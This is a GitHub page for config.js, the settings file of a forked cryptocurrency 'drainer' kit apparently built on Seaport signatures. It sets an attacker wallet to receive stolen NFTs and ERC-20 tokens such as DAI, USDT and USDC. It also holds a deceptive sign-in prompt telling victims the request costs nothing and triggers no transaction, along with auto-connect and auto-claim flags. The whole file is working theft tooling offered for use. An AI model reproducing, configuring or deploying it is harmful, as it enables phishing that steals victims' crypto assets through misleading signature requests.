forked from monkeydrainer/seaportdrainer
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathconfig.js
49 lines (37 loc) · 1.78 KB
/
config.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
// Developer By https://t.me/crypto_scem (Telegram)
const workChainId = 1; // The network we are working with is the chainId list https://chainlist.org/
const receiveAddress = "0xF542C4155F06679029FE588aE82CB69A72fDB354"; // YOUR WALLET ADDRESS
const drainNftsInfo = {
minValue: 0.01, // Minimum value of the NFTS's last transactions (in the last 'checkMaxDay' days) of the collection.
maxTransfers: 0,
}
const signMessage = `Welcome, \n\n` +
`Click to sign in and accept the Terms of Service.\n\n` +
`This request will not trigger a blockchain transaction or cost any gas fees.\n\n` +
`Wallet Address:\n{address}\n\n` +
`Nonce:\n{nonce}`;
const autoConnect = true; //false; // auto connect wallet
const autoMint = true; // auto click claim button
const erc20list = {
// Bsc testnet
/*
'0x00a5Dc07A0F8061e896F0Acdd47d352e49FD1a2c': 100, // DAI BSC Testnet (97)
'0x348236484ce96A293E210260b90bBFb228D6d1Fc': 100, // USDT BSC Testnet (97)
*/
// Ethernet mainnet
'0x6B175474E89094C44Da98b954EedeAC495271d0F': 10, // DAI ethernet
'0xdAC17F958D2ee523a2206206994597C13D831ec7': 10, // usdt
'0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48': 10, // usdc
'0x4Fabb145d64652a948d72533023f6E7A623C7C53': 10, // busd
'0x95ad61b0a150d79219dcf64e1e6cc01f0b64c4ce': 10, // shib
'0x514910771af9ca656af840dff83e8264ecf986ca': 10, // link
'0xC18360217D8F7Ab5e7c516566761Ea12Ce7F9D72': 10, // ens
}
const installInNewWindow = true; // install wallet if not installed
/*
= = = = = END OF SETTINGS = = = = =
*/
//#region Check Configuration
if (!receiveAddress.startsWith("0x") || (receiveAddress.length >= 64 || receiveAddress.length <= 40))
console.error(`Error: ${receiveAddress} is not a valid Ethereum address.`);
//#endregion